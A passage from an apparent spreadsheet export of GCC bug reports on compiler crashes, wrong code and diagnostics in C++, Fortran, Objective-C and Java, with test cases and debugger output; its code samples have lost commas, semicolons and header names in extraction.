	less than obvious what that might be.
Release:
3.0.1
Environment:
System: SunOS slicker 5.6 Generic_105181-25 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ./configure --prefix=/.-ark-deploy/gcc--3.0.1 --enable-languages=cc++ --disable-nls : (reconfigured) ./configure --prefix=/.-ark-deploy/gcc--3.0.1 --enable-languages=cc++ --disable-nls</t>
  </si>
  <si>
    <t>partain</t>
  </si>
  <si>
    <t>GCC-7288</t>
  </si>
  <si>
    <t>Base and derived class don't agree on base class variables</t>
  </si>
  <si>
    <t>The derived class with a virtual function is derived
from shm_object.  The shm_object class overrides the new
operator.  One of the arguments in the overriden new
operator function is stored in the shm_object.arena
variable.  The debugger shows that the value stored is
showing up in another variable of the derived class
_vptr.derived.  Here is what the debugger says when in the
derived constructor:
(gdb) print *this
$8 = { = {arena = 0x0} _vptr.derived = 0x1 derived_variable = 0}
Release:
gcc version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3)
Environment:
Red Hat 7.2 with dual Pentium III processors.
How-To-Repeat:
#include        
using namespace std
class shm_object {
public:
   void* operator new( size_t size void *mem_arena ) {
      void*ptr
      ptr = (void*)new char[size]
      if( ptr ) ((shm_object*)ptr)-&gt;arena = mem_arena
      return ptr
   }
   void* operator new( size_t size ) {
      void*ptr
      ptr = (void*)new char[size]
      if( ptr ) ((shm_object*)ptr)-&gt;arena = NULL
      return ptr
   }
   void operator delete( void *v_ptr ) {
      delete [] (char*)v_ptr
   }
   void*        arena
}
class derived : public shm_object {
public:
   derived() {}
   virtual ~derived() {}
   virtual int dummy() { return 0 }
   int derived_variable
}
int main( int argc char* argv[] )
{
   derived*     d
   d = new( (void*)1 ) derived
   if( d-&gt;arena != (void*)1 ) {
      cout &lt;&lt; Arena is invalid &lt;&lt; endl
   } else {
      cout &lt;&lt; Arena worked &lt;&lt; endl
   }
   delete d
   return 0
}</t>
  </si>
  <si>
    <t>jolley</t>
  </si>
  <si>
    <t>GCC-32470</t>
  </si>
  <si>
    <t>[4.2 regression] fvisibility=hidden without effect in some cases</t>
  </si>
  <si>
    <t>Compiling the following code with fvisibility=hidden exports Test::test().
(The used compiler is 4.2.1 20070622. Version 4.2.0 on a i686 gives the same results).
~$ cat test.cc
#include 
class Test
{
  void test()
}
void Test::test() { }
~$ g++ -fvisibility=hidden -fPIC -c -o test.o test.cc
~$ readelf -s test.o
Symbol table '.symtab' contains 12 entries:
 Num:    Value         Size Type    Bind   Vis      Ndx Name
   0: 0000000000000000    0 NOTYPE  LOCAL  DEFAULT  UND 
   1: 0000000000000000    0 FILE    LOCAL  DEFAULT  ABS test.cc
   2: 0000000000000000    0 SECTION LOCAL  DEFAULT    1 
   3: 0000000000000000    0 SECTION LOCAL  DEFAULT    2 
   4: 0000000000000000    0 SECTION LOCAL  DEFAULT    3 
   5: 0000000000000000    0 SECTION LOCAL  DEFAULT    4 
   6: 0000000000000000    0 SECTION LOCAL  DEFAULT    6 
   7: 0000000000000000    0 SECTION LOCAL  DEFAULT    9 
   8: 0000000000000000    0 SECTION LOCAL  DEFAULT    8 
   9: 0000000000000000   10 FUNC    GLOBAL DEFAULT    1 _ZN4Test4testEv
  10: 0000000000000000    0 NOTYPE  GLOBAL DEFAULT  UND __gxx_personality_v0
  11: 0000000000000000    8 OBJECT  WEAK   HIDDEN    6 DW.ref.__gxx_personality_
After removing #include  from the testcase Test::test() is hidden as expected.
~$ g++ -fvisibility=hidden -fPIC -c -o test.o test.cc
~$ readelf -s test.o
Symbol table '.symtab' contains 12 entries:
 Num:    Value         Size Type    Bind   Vis      Ndx Name
   0: 0000000000000000    0 NOTYPE  LOCAL  DEFAULT  UND 
   1: 0000000000000000    0 FILE    LOCAL  DEFAULT  ABS test.cc
   2: 0000000000000000    0 SECTION LOCAL  DEFAULT    1 
   3: 0000000000000000    0 SECTION LOCAL  DEFAULT    2 
   4: 0000000000000000    0 SECTION LOCAL  DEFAULT    3 
   5: 0000000000000000    0 SECTION LOCAL  DEFAULT    4 
   6: 0000000000000000    0 SECTION LOCAL  DEFAULT    6 
   7: 0000000000000000    0 SECTION LOCAL  DEFAULT    9 
   8: 0000000000000000    0 SECTION LOCAL  DEFAULT    8 
   9: 0000000000000000   10 FUNC    GLOBAL HIDDEN    1 _ZN4Test4testEv
  10: 0000000000000000    0 NOTYPE  GLOBAL DEFAULT  UND __gxx_personality_v0
  11: 0000000000000000    8 OBJECT  WEAK   HIDDEN    6 DW.ref.__gxx_personality_</t>
  </si>
  <si>
    <t>gd</t>
  </si>
  <si>
    <t>GCC-39378</t>
  </si>
  <si>
    <t>Multiple inheritence thunk not working with -mthumb</t>
  </si>
  <si>
    <t>This simple test case crashed in sim when compiler by arm-eabi-gcc for thumb.
-------
class B1
{
 public:
  virtual void foo1(void) {}
  int b1
}
class B2
{
 public:
  virtual void foo2 (void) {}
}
class D : public B1 public B2
{
 void foo1(void) {}
 void foo2(void) {}
}
void __attribute__((noinline))
test(B2* bp)
{
  bp-&gt;foo2()
}
int
main()
{
  D d
  test (
  return 0
}
-------
$ arm-eabi-g++ -mthumb -mthumb-interwork bug.cc
$ arm-eabi-gdb a.out
GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as --host=i686-unknown-linux-gnu --target=arm-eabi...
(gdb) target sim
Connected to the simulator.
(gdb) load a.out
Loading section .init size 0xc vma 0x8000
Loading section .text size 0x32b8 vma 0x800c
Loading section .fini size 0xc vma 0xb2c4
Loading section .rodata size 0x208 vma 0xb2d0
Loading section .ARM.extab size 0x90 vma 0xb4d8
Loading section .ARM.exidx size 0x248 vma 0xb568
Loading section .eh_frame size 0x4 vma 0xb7b0
Loading section .init_array size 0x4 vma 0x137b4
Loading section .fini_array size 0x4 vma 0x137b8
Loading section .jcr size 0x4 vma 0x137bc
Loading section .data size 0x930 vma 0x137c0
Start address 0x806c
Transfer rate: 132992 bits in &lt;1 sec.
(gdb) run
Starting program: /usr/local/google/data/dougkwan/arm-elf/test/a.out 
Unhandled v6 thumb insn: e92d
sim: exception: Unhandled Instruction '0xe92d4080' at 0x000081d0.  Stopping.
Program received signal 0 Signal 0.
0x00000b90 in ?? ()
(gdb) quit
The program is running.  Exit anyway? (y or n) y
$ arm-eabi-g++ -v                              
Using built-in specs.
Target: arm-eabi
Configured with: /data/dougkwan/arm-elf/src/gcc-trunk/configure --prefix=/data/dougkwan/arm-elf/install --target=arm-eabi --build=i686-unknown-linux-gnu --host=i686-unknown-linux-gnu --with-gmp=/home/dougkwan/gcc-lib/install --with-mpfr=/home/dougkwan/gcc-lib/install --with-arch=armv5te --enable-interwork --enable-multilib --with-newlib --with-gnu-as --with-gnu-ld --enable-languages=cc++
Thread model: single
gcc version 4.4.0 20090305 (experimental) (GCC)
This works fine in 4.2.x.  The problem is that crtl-&gt;is_thunk is set during thunk emission but is not not reset after.  So target function of a thunk is also emitted with crtl-&gt;is_thunk set.  That cause the function to be emitted in ARM mode.  Below is part of the assembly output of the test above.
        .section        .text._ZN1D4foo2EvaxG%progbits_ZN1D4foo2Evcomdat
        .align  2
        .weak   _ZThn8_N1D4foo2Ev
        .code 32
        .type   _ZThn8_N1D4foo2Ev %function
_ZThn8_N1D4foo2Ev:
        .fnstart
        ldr     r12 .LTHUMBFUNC0
        sub     r0 r0 #8
        bx      r12
        .align  2
.LTHUMBFUNC0:
        .word   .LTHUNK0
        .fnend
        .size   _ZThn8_N1D4foo2Ev .-_ZThn8_N1D4foo2Ev
        .align  2
        .weak   _ZN1D4foo2Ev
        .code 32
        .type   _ZN1D4foo2Ev %function
_ZN1D4foo2Ev:
        .fnstart
.LFB3:
        .save   {r7 lr}
        push    {r7 lr}
.LCFI9:
        sub     sp sp #8
.LCFI10:
        add     r7 sp #0
.LCFI11:
        str     r0 [r7 #4]
        mov     sp r7
        add     sp sp #8
        @ sp needed for prologue
        pop     {r7 pc}
.LFE3:
        .cantunwind
        .fnend
        .size   _ZN1D4foo2Ev .-_ZN1D4foo2Ev
Note that the function _ZN1D4foo2Ev (unmangled as D::foo2()) is emitted in ARM mode.  However in the typeinfo for B1 the function is marked as a THUMB function.
_ZTI2B1:
        .word   _ZTVN10__cxxabiv117__class_type_infoE+8
        .word   _ZTS2B1
        .thumb_set .LTHUNK0_ZN1D4foo2Ev
I believe this problem can be fixed by saving and restoring crtl-&gt;is_thunk around the call to the lang-hook callgraph.emit_associated_thunks in cgraphunit.c</t>
  </si>
  <si>
    <t>dougkwan</t>
  </si>
  <si>
    <t>GCC-2486</t>
  </si>
  <si>
    <t>ice in connect_post_landing_pads (optimization on)</t>
  </si>
  <si>
    <t xml:space="preserve">The following legal simple code to.C causes an internal compiler error in
cc1plus if optimization (at least -O) is turned on. The compiler
crashes in connect_post_landing_pads () at ../../gcc/gcc/except.c:1813
with a segmentation fault.
Release:
3.1 20010404 (experimental)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
Glibc 2.2
GNU ld version 2.11.90.0.4 (with BFD 2.11.90.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
source code to.C
#include 
#include 
#include 
using namespace std
int main()
{
    copy (istream_iterator(cin) istream_iterator()      
          ostream_iterator(cout\n)) 
}
Compiling to.C
g++ -v -O to.C -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
gcc version 3.1 20010404 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ to.C to.ii
GNU CPP version 3.1 20010404 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed to.ii -quiet -dumpbase to.C -O -version -o to.s
GNU CPP version 3.1 20010404 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010404 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010404 (experimental).
/usr/local/include/g++-v3/bits/stl_algobase.h: In function `_OutputIter 
   std::__copy_ni1(_InputIter _InputIter _OutputIter _Bool) [with 
   _InputIter = std::istream_iterator 
   ptrdiff_t&gt; _OutputIter = std::ostream_iterator&lt;string char 
   std::char_traits &gt;]':
/usr/local/include/g++-v3/bits/stl_algobase.h:252:   instantiated from `_OutputIter std::copy(_InputIter _InputIter _OutputIter) [with _InputIter = std::istream_iterator ptrdiff_t&gt; _OutputIter = std::ostream_iterator &gt;]'
to.C:8:   instantiated from here
/usr/local/include/g++-v3/bits/stl_algobase.h:8: Internal error: Segmentation 
   fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
debugging cc1plus
GNU gdb 20010325
Copyright 2001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686-pc-linux-gnu...
Breakpoint 1 at 0x80494d4
Breakpoint 2 at 0x8164086: file ../../gcc/gcc/diagnostic.c line 1766.
Breakpoint 3 at 0x80492d4
(gdb) set args -O to.C
(gdb) r
*many lines deleted*
Program received signal SIGSEGV Segmentation fault.
0x0817e1b3 in connect_post_landing_pads () at ../../gcc/gcc/except.c:1813
(gdb) bt
#0  0x0817e1b3 in connect_post_landing_pads () at ../../gcc/gcc/except.c:1813
#1  0x0817edc9 in finish_eh_generation () at ../../gcc/gcc/except.c:2338
#2  0x082d6967 in rest_of_compilation (decl=0x409e6f70)
    at ../../gcc/gcc/toplev.c:2906
#3  0x081161b6 in genrtl_finish_function (fn=0x409e6f70)
    at ../../gcc/gcc/cp/semantics.c:2709
#4  0x081157e6 in expand_body (fn=0x409e6f70)
    at ../../gcc/gcc/cp/semantics.c:2495
#5  0x080a05c5 in instantiate_decl (d=0x409e6f70 defer_ok=0)
    at ../../gcc/gcc/cp/pt.c:9950
#6  0x080a0ebb in instantiate_pending_templates ()
    at ../../gcc/gcc/cp/pt.c:10027
#7  0x080c1a2c in finish_file () at ../../gcc/gcc/cp/decl2.c:3535
#8  0x080d533c in yyparse_1 () at /usr/share/bison.simple:441
#9  0x082d5cb8 in compile_file (name=0xbffff9bf to.C)
    at ../../gcc/gcc/toplev.c:2359
#10 0x082d9ced in toplev_main (argc=3 argv=0xbffff82c)
    at ../../gcc/gcc/toplev.c:4953
#11 0x40039baf in __libc_start_main () from /lib/libc.so.6
(gdb) l
1808	      if (after &amp;&amp; GET_CODE (after) == BARRIER)
1809		continue
1810	
1811	      /* Search for another landing pad in this function.  */
1812	      for (outer = region-&gt;outer outer  outer = outer-&gt;outer)
1813		if (outer-&gt;post_landing_pad)
1814		  break
1815	
1816	      start_sequence ()
1817	
(gdb) info locals
region = (struct eh_region *) 0x8653008
outer = (struct eh_region *) 0x40a6bdc0
before = 0x0
after = 0x40a4ad90
seq = 0x40a6bdc0
i = 13
(gdb) p outer
$1 = (struct eh_region *) 0x40a6bdc0
(gdb) p *outer
$2 = {outer = 0x20 inner = 0xa31 next_peer = 0x40a49fa0 
  region_number = 1084699216 type = 1084699200 u = {try = {
      catch = 0xffffffff last_catch = 0x0 prev_try = 0x0 
      continue_label = 0x0} catch = {next_catch = 0xffffffff 
      prev_catch = 0x0 type = 0x0 filter = 0} allowed = {
      type_list = 0xffffffff filter = 0} throw = {type = 0xffffffff} 
    cleanup = {exp = 0xffffffff} fixup = {cleanup_exp = 0xffffffff 
      real_region = 0x0}} label = 0xafafafaf last = 0xafafafaf 
  landing_pad = 0xafafafaf post_landing_pad = 0xafafafaf}
(gdb) 
Bzip2 compressed and uuencoded preprocessed source file to.ii
See attachments for to.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-36325</t>
  </si>
  <si>
    <t>specific or generic INTERFACE implies the EXTERNAL attribute</t>
  </si>
  <si>
    <t>I think the following code is invalid:
interface
  subroutine foo
  end subroutine
end interface
external foo
Because the INTERFACE statement already specifies the EXTERNAL attribute which is thus specified twice.
This code *is* actually rejected (as of rev. 135859) but the error message is completely wrong:
external :: foo
              1
Error: EXTERNAL attribute conflicts with SUBROUTINE attribute at (1)
(which it does *not* for this case)
Quoting the Fortran 2003 standard (section 5.1.2.6):
The EXTERNAL attribute speciï¬es that an entity is an external procedure dummy procedure procedure pointer or block data subprogram. This attribute may also be speciï¬ed by an EXTERNAL statement (12.3.2.2) a procedure-declaration-stmt (12.3.2.3) or an interface body that is not in an abstract interface block (12.3.2.1).
And further on in section 12.3.2.1:
An interface body in a generic or speciï¬c interface block speciï¬es the EXTERNAL attribute and an explicit speciï¬c interface for an external procedure or a dummy procedure. If the name of the declared procedure is that of a dummy argument in the subprogram containing the interface body the procedure is a dummy procedure otherwise it is an external procedure.</t>
  </si>
  <si>
    <t>jaydub66</t>
  </si>
  <si>
    <t>GCC-81573</t>
  </si>
  <si>
    <t>[8 Regression] wrong code at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170727 (experimental) [trunk revision 250601] (GCC) 
$ 
$ gcc-trunk -O2 small.c ./a.out
$ 
$ gcc-trunk -O3 small.c
$ timeout -s 9 5 ./a.out
Killed
$ 
------------------------------
int a = 1 *c = 
char b
int main ()
{
  for ( b &gt; -27 b--)
    {
      *c ^= b
      *c ^= 1
    }
  while (a &gt; 1)
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-56519</t>
  </si>
  <si>
    <t>DO CONCURRENT: wrongly accepts calls to impure intrinsics</t>
  </si>
  <si>
    <t>Based on https://groups.google.com/d/topic/comp.lang.fortran/cZ1KQ_2Zt_c/discussion
The following program is accepted but the intrinsic procedure is IMPURE. (F2008:)
C825   A reference to a nonpure procedure shall not appear within a
       DO CONCURRENT construct.
Note: All standard intrinsic functions are pure. (cf. F2008 13.1). But only some subroutines are pure. However in intrinsics.c the used intrinsic subroutine is marked as CLASS_IMPURE! And in principle gfc_intrinsic_sub_interface checks for this â€“ but it does not seem to work here. While it triggers in a URE subroutine.
implicit none
integer :: i
real :: array(123) val
do concurrent (i = 1:123)
  call random_number (val) ! INVALID: Impure but accepted
  array(i) = val
  !call foo(array) ! OK rejected with:
  !       Subroutine call to 'foo' in DO CONCURRENT block at (1) is not PURE
end do
end</t>
  </si>
  <si>
    <t>GCC-12262</t>
  </si>
  <si>
    <t>GCC can't find a class for a selector even if the class was given explicitly</t>
  </si>
  <si>
    <t>selez@barad~&gt; gcc -v
Reading specs from d:/CokeKit/Developer/mingw/bin/../lib/gcc-
lib/mingw32/3.2.3/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --
host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --
enable-languages=c++f77objc --disable-win32-registry --disable-shared --
enable-sjlj-exceptions
Thread model: win32
gcc version 3.2.3 (mingw special 20030504-1)
selez@barad~&gt; uname -a
CYGWIN_NT-5.1 barad 1.3.19(0.71/3/2) 2003-01-23 21:31 i686 unknown unknown 
Cygwin
selez@barad~&gt; gcc -Wall -save-temps gcc_selectors.m -lobjc
gcc_selectors.m: In function `main':
gcc_selectors.m:13: warning: multiple declarations for method `currentContext'
gcc_selectors.m:4: warning: using `+(A *)currentContext'
gcc_selectors.m:8: warning: also found `+(B *)currentContext'
selez@barad~&gt; cat gcc_selectors.m
#include 
@interface A
+ (A *)currentContext
@end
@interface B
+ (B *)currentContext
@end
int main()
{
    [A currentContext]
    return 0
}
@implementation A
+ (A *)currentContext { return nil }
@end
@implementation B
+ (B *)currentContext { return nil }
@end</t>
  </si>
  <si>
    <t>selez</t>
  </si>
  <si>
    <t>GCC-35921</t>
  </si>
  <si>
    <t>Con/de-structor definition fails to override dllimport declaration</t>
  </si>
  <si>
    <t>When the attached file is compiled with a mingw32 build of GCC 4.3.0 the constructor definition for foo does not fully override the declaration in the struct which inherits the dllimport attribute and a dllimport reference is incorrectly emitted. The member function bar() is provided as an example of correctly overriding the dllimport declaration this issue only occurs with constructors and destructors.
Compilation command line and output:
&gt; g++ -c impoverride.cpp
impoverride.cpp:8: warning: 'foo::foo()' redeclared without dllimport attribute:
 previous dllimport ignored
impoverride.cpp:12: warning: 'void foo::bar()' redeclared without dllimport attr
ibute: previous dllimport ignored
&gt; nm impoverride.o
00000000 b .bss
00000000 d .data
00000000 t .text
00000011 T __Z3depv
0000000c T __ZN3foo3barEv
00000006 T __ZN3fooC1Ev
00000000 T __ZN3fooC2Ev
         U __imp___ZN3fooC1Ev &lt;&lt; Shouldn't be there!
&gt; g++ -v
Using built-in specs.
Target: mingw32
Configured with: ../../gcc-4.3.0-ehstatic/configure --prefix=/mingw --build=ming
w32 --enable-languages=cc++ --disable-nls --disable-win32-registry --enable-sjl
j-exceptions --enable-libgomp --with-gmp=/d/cygdev/gccbuild/libsfor43/debug/gmp-
install --with-mpfr=/d/cygdev/gccbuild/libsfor43/debug/mpfr-install --with-libic
onv-prefix=/d/cygdev/gccbuild/libsfor43/debug/iconv-install --disable-werror --e
nable-threads --enable-libstdcxx-debug --enable-cxx-flags='-fno-function-section
s -fno-data-sections' --disable-symvers
Thread model: win32
gcc version 4.3.0 (GCC)</t>
  </si>
  <si>
    <t>tdragon</t>
  </si>
  <si>
    <t>GCC-68463</t>
  </si>
  <si>
    <t>Offloading fails when some objects are compiled with LTO and some without</t>
  </si>
  <si>
    <t>The reproducer:
$ cat foo.c
void foo ()
{
  #pragma omp target
}
$ cat bar.c
void bar ()
{
  #pragma omp target
}
$ cat main.c
extern void foo ()
extern void bar ()
int main ()
{
  foo ()
  bar ()
  return 0
}
$ gcc -c -fopenmp -flto foo.c
$ gcc -c -fopenmp bar.c main.c
$ gcc -fopenmp foo.o bar.o main.o
main.o: In function `main':
main.c:(.text+0x14): undefined reference to `bar'
collect2: error: ld returned 1 exit status
This happens because the linker plugin in claim_file_handler claims bar.o and
linker just drops it because linker considers bar.o as LTO object.
Without offload it claims only LTO objects but now it claims objects with any
IR.  (Yes offloading misuses lto-plugin and lto-wrapper a bit.)
And even worse it fails with -foffload=disable because we decided to stream-
out offload IR unconditionally:
https://gcc.gnu.org/ml/gcc-patches/2014-10/msg00628.html
So -foffload=disable only disables compilation of target images in lto-wrapper
but objects are handled by linker plugin before that.
The first solution that comes to mind - do not claim objects which contain
offload IR without LTO IR.  But this will cause run-time error:
libgomp: Cannot map target functions or variables (expected 1 have 2)
because lto-wrapper will surround only *.ltrans.o (derived from foo.o) with
crtoffload{beginend}.o and bar.o will be added at the end of the list of
objects from lto-wrapper.  But we need this order to get correct host table:
crtoffloadbegin.o *.ltrans.o bar.o crtoffloadend.o.
Here is a bit more about tables:
https://gcc.gnu.org/wiki/Offloading#Address_mapping_tables
Or maybe we should implement new linker offload-plugin with its offload-wrapper
but I don't know how difficult it would be to support 2 plugins in the linkers
and it really doesn't solve the issue with crtoffload{beginend}.o placement.
Or maybe just print an error during linking that offloading doesn't support
mixing LTO and non-LTO objects (even if some of them doesn't have offload)?</t>
  </si>
  <si>
    <t>jnorris</t>
  </si>
  <si>
    <t>iverbin</t>
  </si>
  <si>
    <t>GCC-33928</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6/4.7 Regression] 30% performance slowdown in floating-point code caused by  r118475</t>
  </si>
  <si>
    <t>With these compile options
-Wall -W -Wno-unused -O1 -fno-math-errno -fschedule-insns2 -fno-trapping-math -fno-strict-aliasing -fwrapv -fomit-frame-pointer -fPIC -fno-common -mieee-fp
With this compiler:
euler-44% /pkgs/gcc-mainline/bin/gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../../mainline/configure --prefix=/pkgs/gcc-mainline --enable-languages=c --enable-checking=release --with-gmp=/pkgs/gmp-4.2.2 --with-mpfr=/pkgs/gmp-4.2.2
Thread model: posix
gcc version 4.3.0 20071026 (experimental) [trunk revision 129664] (GCC) 
With the following routine compiled with gcc-4.2.2 you get
(time (direct-fft-recursive-4 a table))
    366 ms real time
    366 ms cpu time (366 user 0 system)
    no collections
    64 bytes allocated
    no minor faults
    no major faults
while with today's mainline you get
(time (direct-fft-recursive-4 a table))
    448 ms real time
    448 ms cpu time (448 user 0 system)
    no collections
    64 bytes allocated
    no minor faults
    no major faults
I've isolated that one routine and I'll add it at the end of an attachment unfortunately there are a lot of declarations and global data that are difficult to winnow.
There is really only one main loop in the routine the one that begins at ___L19_direct_2d_fft_2d_recursive_2d_4.  This loop was scheduled in 102 cycles (sched2) on 4.4.2 and in 134 cycles in mainline.</t>
  </si>
  <si>
    <t>GCC-5682</t>
  </si>
  <si>
    <t>ICE in build_secondary_vtable</t>
  </si>
  <si>
    <t>struct A
{
  virtual int f1 ()
}
class B : public virtual A
{
}
struct C
{
  virtual int f2 ()
}
class E : public A
{
}
class D : public E public B
{
}
class F : public virtual D
{
}
class G : public virtual F public C
{
}
class H : public virtual F
{
}
class I : public G public H
{
}
causes ICE in build_secondary_vtable at cp/class.c:674
binfo != binfo_for_vbase(BINFO_TYPE(binfo) for_type)
Release:
gcc-3.1 20020213
Environment:
Any</t>
  </si>
  <si>
    <t>GCC-33054</t>
  </si>
  <si>
    <t>RANDOM_SEED is broken with -fdefault-integer-8</t>
  </si>
  <si>
    <t>The code generated to call RANDOM_SEED doesn't take into account the existence of a possible default integer kind other than 4. For example:
$ cat o.f90
  integer :: i j(8)
  call random_seed (size=i)
  print * i
  call random_seed (get=j)
  print * j
  call random_seed (put=j)
  end
$ gfortran o.f90 -fdefault-integer-8 -fdump-tree-original &amp;&amp; ./a.out
                    8
  1556651063369256213  1358030301163568053  1969796612819413169  1882033285047892425                    0                    0                    0                    0
and the tree dump clearly shows that wrong type arguments are passed to _gfortran_random_seed which would lead to worst things on big-endian platforms:
  int8 j[8]
  int8 i
 _gfortran_random_seed (
I think it would be not to hard to make two different library functions one for int4 and the other one for int8. The int8 would then report a SIZE of the seed that is half the size for int4 and that should do the trick.
Thomas any opinion on that?</t>
  </si>
  <si>
    <t>GCC-29098</t>
  </si>
  <si>
    <t>allocation of a pointer to a derived type crashes</t>
  </si>
  <si>
    <t>Symptom:
$ gfortran -c test.F90
test.F90: In function 'MAIN__':
test.F90:24: internal compiler error: in gfc_trans_call at
fortran/trans-stmt.c:325
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Version:
$ gfortran -v
Using built-in specs.
Target: i386-linux
Configured with: ../gcc/configure
--prefix=/cosmic/coudert/tmp/gfortran-20060906/irun --enable-languages=cfortran
--host=i386-linux --with-gmp=/cosmic/coudert/tmp/gfortran-20060906/gfortran_libs
Thread model: posix
gcc version 4.2.0 20060904 (experimental)
Code enclosed (cut down as much as possible)
 MODULE MAT
   TYPE BAS
      INTEGER :: R = 0C = 0
   END TYPE BAS
   TYPE BLOCK
      INTEGER DIMENSION(:) POINTER ::  RC
      TYPE(BAS) POINTER DIMENSION(:) :: NO =&gt; NULL()
   END TYPE BLOCK
   INTERFACE ASSIGNMENT(=)
      MODULE PROCEDURE BLASSIGN
   END INTERFACE
   CONTAINS
      SUBROUTINE BLASSIGN(AB)
      TYPE(BLOCK) INTENT(IN) :: B
      TYPE(BLOCK) INTENT(INOUT) :: A
      INTEGER IN
      ! ...
      END SUBROUTINE BLASSIGN
 END MODULE MAT
PROGRAM TEST
USE MAT
TYPE(BLOCK) MATRIX
POINTER MATRIX
ALLOCATE(MATRIX)
END</t>
  </si>
  <si>
    <t>vahtras</t>
  </si>
  <si>
    <t>GCC-82054</t>
  </si>
  <si>
    <t>[8 Regression] ICE in add_dwarf_attr with -fopenmp and -g</t>
  </si>
  <si>
    <t>Created attachment 42090
C++ source code
The attached C++ code does this
grid.cpp: In member function â€˜bool CSG_Grid::Create(const CSG_Grid&amp;)â€™:
grid.cpp:1283:1: internal compiler error: in add_dwarf_attr at dwarf2out.c:4132
0xa1edde add_dwarf_attr
	../../trunk/gcc/dwarf2out.c:4132
0xa1f059 add_AT_die_ref
	../../trunk/gcc/dwarf2out.c:4509
0xa4a672 gen_subprogram_die
	../../trunk/gcc/dwarf2out.c:22371
0xa4ca03 gen_decl_die
	../../trunk/gcc/dwarf2out.c:25320
when compiled by recent gcc trunk. Flags -fopenmp and -g required.</t>
  </si>
  <si>
    <t>GCC-18728</t>
  </si>
  <si>
    <t>GCJ allows creation of inner class without qualifying reference</t>
  </si>
  <si>
    <t>Compiling the following code with gcj (at least with version 3.4.2 as shipped
with Fedora Core 3) reports no errors or warnings:
    class A { class B { int value } }
    class VerifyBug {
        A.B b
        VerifyBug() { b = new A.B() }
        static void main(String args[]) {
            VerifyBug v = new VerifyBug()
        }
    }
However when attempting to run the resulting class files with either libgcj or
the Sun JDK 1.5.0 a java.lang.VerifyError is thrown.
Below is the output from a gij invocation:
Exception in thread main java.lang.VerifyError: verification failed at PC 10
in VerifyBug:(()V): incompatible type on stack
   at _Jv_BytecodeVerifier.verify_fail(byte int) (/usr/lib/libgcj.so.5.0.0)
   at _Jv_BytecodeVerifier.pop_init_ref(_Jv_BytecodeVerifier.type)
(/usr/lib/libgcj.so.5.0.0)
   at _Jv_BytecodeVerifier.verify_instructions_0() (/usr/lib/libgcj.so.5.0.0)
   at _Jv_VerifyMethod(_Jv_InterpMethod) (/usr/lib/libgcj.so.5.0.0)
   at _Jv_PrepareClass(java.lang.Class) (/usr/lib/libgcj.so.5.0.0)
   at _Jv_WaitForState(java.lang.Class int) (/usr/lib/libgcj.so.5.0.0)
   at java.lang.VMClassLoader.linkClass0(java.lang.Class) (/usr/lib/libgcj.so.5.0.0)
   at java.lang.VMClassLoader.resolveClass(java.lang.Class)
(/usr/lib/libgcj.so.5.0.0)
   at java.lang.Class.initializeClass() (/usr/lib/libgcj.so.5.0.0)
   at java.lang.Class.forName(java.lang.String boolean java.lang.ClassLoader)
(/usr/lib/libgcj.so.5.0.0)
   at java.lang.Class.forName(java.lang.String) (/usr/lib/libgcj.so.5.0.0)
   at gnu.gcj.runtime.FirstThread.run() (/usr/lib/libgcj.so.5.0.0)
   at _Jv_ThreadRun(java.lang.Thread) (/usr/lib/libgcj.so.5.0.0)
   at _Jv_RunMain(java.lang.Class byte const int byte const boolean)
(/usr/lib/libgcj.so.5.0.0)
   at __libc_start_main (/lib/tls/libc-2.3.3.so)
I believe the original Java code is actually wrong as non-static inner classes
